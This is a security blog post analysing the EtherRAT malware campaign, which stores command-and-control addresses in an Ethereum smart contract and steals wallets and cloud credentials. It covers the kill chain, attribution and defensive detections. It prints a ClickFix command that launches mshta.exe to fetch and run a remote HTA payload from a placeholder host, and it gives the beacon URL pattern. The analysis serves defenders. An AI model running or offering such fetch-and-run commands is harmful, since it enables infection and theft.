DEV Community

ohmygod
ohmygod

Posted on

EtherRAT: How North Korean Hackers Weaponized Ethereum Smart Contracts Into an Unkillable Command Server That Steals Your Crypto

#security #blockchain #ethereum #defi

A deep dive into the EtherRAT malware campaign — where the blockchain itself becomes the attacker's infrastructure, and your Ethereum RPC calls fund the C2 resolution.

The 30-Second Version

A Node.js backdoor called EtherRAT stores its command-and-control (C2) addresses inside an Ethereum smart contract. When security teams take down a C2 server, the attacker simply writes a new address to the contract for pennies in gas — and every infected machine reconnects automatically. The malware steals cryptocurrency wallets, cloud credentials, and system fingerprints, and it was discovered in a live retail-sector breach in March 2026. Researchers at eSentire and Sysdig link it to North Korea's "Contagious Interview" APT campaign.

If you build DeFi protocols, audit smart contracts, or simply use a browser wallet — you need to understand this attack.

Why Smart Contracts Make Perfect C2 Infrastructure

Traditional malware hardcodes C2 domains or IPs. Defenders buy takedowns, sinkhole domains, or block IPs. Game over.

EtherRAT flips the script:

  1. Immutable storage — data on Ethereum can't be deleted by law enforcement
  2. Cheap rotation — writing a new C2 address costs ~$0.50 in gas
  3. Public accessibility — any Ethereum RPC endpoint can read the contract
  4. No single point of failure — 9 RPC providers queried in parallel with consensus voting

The attacker's smart contract at 0xe26c57b7...ac127d3 has been active across multiple campaigns targeting retail, finance, software, and business services. Every setString event on Etherscan is a C2 rotation — visible to anyone, stoppable by no one.

The Consensus Trick

EtherRAT doesn't trust any single RPC provider. It queries nine simultaneously:

eth.llamarpc.com
mainnet.gateway.tenderly.co
rpc.flashbots.net/fast
rpc.mevblocker.io
eth-mainnet.public.blastapi.io
ethereum-rpc.publicnode.com
rpc.payload.de
eth.drpc.org
eth.merkle.io
Enter fullscreen mode Exit fullscreen mode

It then picks the C2 address returned by the majority. This defeats node poisoning — even if a defender compromises 4 of 9 RPC endpoints, the attacker still wins the vote.

The Kill Chain: From ClickFix to Crypto Drain

Stage 0: Initial Access

Two primary vectors observed:

  • ClickFix attacks — social engineering that tricks victims into running a PowerShell/cmd command
  • IT support scams — attackers impersonate IT staff on Microsoft Teams, then use QuickAssist for remote access

The ClickFix variant uses indirect command execution through pcalua.exe (a Windows LOLBin) to launch mshta.exe, bypassing application whitelisting:

cmd.exe /min /c "pcalua.exe -a mshta.exe -c https://malicious-domain/payload.hta"
Enter fullscreen mode Exit fullscreen mode

The caret character (^) is inserted between every letter to evade command-line logging and signature detection.

Stage 1: Encrypted Loader

A Node.js script decrypts the next stage from a .dat file using AES-256-CBC with a hardcoded key/IV. The decrypted payload is executed in-memory via module._compile() — no file touches disk.

Stage 2: Persistence + EtherRAT Deployment

The second stage:

  1. Decrypts EtherRAT from a .cfg file (again AES-256-CBC)
  2. Writes it to disk as a .bin file
  3. Executes via child_process.spawn()
  4. Creates an HKCU Run key with a random 12-character hex name
  5. Uses conhost.exe --headless to proxy-execute node.exe — hiding the malware process

Stage 3: EtherRAT Core

The main implant:

  1. Resolves C2 from Ethereum smart contract via 9 RPC providers
  2. Beacons using CDN-mimicking URLs: 
   https://<C2>/api/<8-hex>/<UUID>/<8-hex>.ico?b=<build-id>
Enter fullscreen mode Exit fullscreen mode

File extensions rotate through png, jpg, gif, css, ico, webp. Query parameters cycle through id, token, key, b, q, s, v. To any network monitor, this looks like normal CDN asset fetching.

  1. Executes arbitrary code received from C2
  2. Polls every 5 minutes for new C2 addresses on-chain
  3. Self-reobfuscates — sends its own source code to C2, receives a freshly obfuscated version, overwrites itself, and restarts. Every infected machine becomes unique.

The SYS_INFO Module

After initial beaconing, the C2 delivers a fingerprinting module that collects:

  • Public IP, CPU/GPU specs, OS details
  • Antivirus software inventory
  • Domain membership and admin status
  • System language (self-deletes if CIS-region languages detected — classic DPRK/Russian APT behavior)

This data drives target selection — high-value targets (crypto companies, DeFi developers) get follow-on payloads. Everyone else might just become a botnet node.

The Crypto Theft Component

EtherRAT specifically targets:

  • Browser extension wallets — MetaMask, Phantom, Rabby, and others
  • Standalone wallet applications — desktop Solana and Ethereum wallets
  • Seed phrase files — anything matching common backup patterns
  • Cloud credentials — AWS, GCP, Azure keys that might access hot wallet infrastructure
  • SSH keys — for lateral movement into DeFi team infrastructure

The irony is devastating: Ethereum's own infrastructure powers the malware that steals Ethereum wallets.

The DPRK Connection

Sysdig's analysis links EtherRAT to North Korea's "Contagious Interview" campaign based on:

  • Encrypted loader pattern — identical AES-256-CBC staging
  • Obfuscator.io usage — same obfuscation tool with similar dead-code injection
  • CIS language checks — consistent with DPRK operational security
  • Supply chain vectors — EtherRAT has also been distributed through typosquatted npm packages and exploiting CVE-2025-55182 (React2Shell)
  • Overlap with Tsundere botnet — similar OS fingerprinting commands and delivery infrastructure

North Korean threat actors have stolen an estimated $1.5B+ in cryptocurrency in 2025 alone (the Bybit hack accounted for $1.4B). EtherRAT represents an evolution: instead of one-off heists, they're building persistent access infrastructure that uses the blockchain itself as an unkillable backbone.

Defense: What DeFi Teams Should Do Right Now

1. Monitor Ethereum RPC Traffic

If your development machines are making eth_call requests to unknown smart contracts, that's a red flag. Legitimate DeFi development calls contracts you know about.

# Quick detection: grep for the known EtherRAT contract
grep -r "0xe26c57b7fa8de030238b0a71b3d063397ac127d3" /var/log/
Enter fullscreen mode Exit fullscreen mode

Better: set up network monitoring rules for eth_call to unrecognized contracts from developer workstations.

2. Block or Alert on Public RPC Providers from Non-Dev Machines

EtherRAT uses 9 well-known public RPC endpoints. If your accounting department's machines are talking to eth.llamarpc.com, something is very wrong.

3. Watch for LOLBin Chains

The pcalua.exe → mshta.exe chain is a known detection opportunity:

# Sigma rule sketch
detection:
  selection:
    ParentImage|endswith: '\pcalua.exe'
    Image|endswith: '\mshta.exe'
  condition: selection
Enter fullscreen mode Exit fullscreen mode

4. Audit Your npm/PyPI Dependencies

EtherRAT has been distributed through typosquatted packages. Use lockfiles, verify package checksums, and run npm audit / pip-audit in CI.

5. Hardware Wallets for Everything

If your private keys are on a machine that runs Node.js development tools, they're accessible to EtherRAT. Full stop. Hardware wallets with transaction signing on-device are the minimum for any meaningful holdings.

6. Smart Contract Monitoring

The attacker's contract emits events on every C2 rotation. Security teams can:

  • Monitor setString events on known malicious contracts
  • Build allowlists of "expected" smart contracts for dev environments
  • Use Forta detection bots to alert on suspicious contract interactions

The Bigger Picture: Blockchain as Attack Infrastructure

EtherRAT isn't the first malware to abuse blockchain for C2 — the EtherHiding technique was documented as early as 2023. But EtherRAT represents a maturation:

Feature Early EtherHiding EtherRAT (2026)
RPC providers 1-2 9 with consensus voting
Takedown resistance Moderate Very high
Self-update No Full reobfuscation
Target selection None SYS_INFO profiling
Attribution Commodity Nation-state (DPRK)

The uncomfortable truth: Ethereum's permissionless nature is a feature for users and a feature for attackers. You can't censor a smart contract without breaking the entire value proposition of public blockchains.

This means defense must shift to the endpoint and network layers. The blockchain itself won't save you — because the blockchain is also working for the attacker.

Key Takeaways

  1. EtherRAT stores C2 addresses in Ethereum smart contracts — making traditional takedowns ineffective
  2. 9-provider consensus voting defeats RPC node poisoning attempts
  3. Self-reobfuscation makes every infected machine unique, breaking signature detection
  4. DPRK attribution places this in the context of state-sponsored crypto theft
  5. CDN-mimicking beacons blend into normal web traffic
  6. Defense requires endpoint + network monitoring — the blockchain layer is attacker-controlled

The malware that steals your crypto is powered by the same blockchain your crypto runs on. Welcome to 2026.

References: eSentire TRU advisory (March 25, 2026), Sysdig DPRK attribution analysis, Checkmarx supply chain research, Infosecurity Magazine reporting.

Top comments (0)